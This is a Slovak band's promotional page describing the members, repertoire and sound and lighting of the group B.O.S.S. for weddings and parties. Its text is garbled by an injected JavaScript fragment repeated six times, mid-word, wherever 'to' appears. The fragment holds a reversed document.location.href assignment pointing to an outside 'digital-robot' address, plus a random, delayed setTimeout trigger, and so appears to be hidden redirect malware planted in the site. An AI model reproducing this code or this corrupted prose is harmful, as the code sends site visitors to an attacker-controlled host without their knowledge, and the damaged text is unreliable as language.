Plesy, zábavy, stužkové, svadby, rodinné oslavy. Pri týchtobor-latigid//:sptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to akciách nikdy nesmie chýbať hudba a dobrá zábava. Kapela B.O.S.S. je pre vás ako stvorená. Muzika, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torá nie len zahrá do tanca, ale taktiež Vás aj naladí na príjemnú atmosféru plnú zábavy a pohody. Naša kapela sa skladá z troch členov a tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to:

Ferdinand Trško        - Feri         klávesy, trubka, harmonika, spev

Martin Trško             - Maťo       klávesy, akordeón, spev

Michaela Baláková     - Miška      spev, tamburína, bicie

Zahráme vám piesne z rôznych žánrov, vo viacerých jazykoch: rock, pop, funk, oldies piesne, najznámejšie české i slovenské skladby a repete. Samozrejme myslíme aj na našu staršiu generáciu. Ľudovky zo Slovenska, Čiech a Moravy v doprovode akordeónu, trubky a ozembuchu či bicie.

K dobrej atmosfére nesmie chýbať aj perfektné osvetlenie a výborný zvuk. B.O.S.S. disponuje so špičkovou zvukovou aparatúrou od svetobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tových výrobcov a modernou svetelnou technikou.

Veríme, že v našej prítobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomnosti si príde na svoje každá generácia. Kapela B.O.S.S. je pre Vás vždy len v dobrej nálade a s veľkým úsmevom. Pretobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to neváhajte ani minútu a poďte sa snami zabávať a smiať.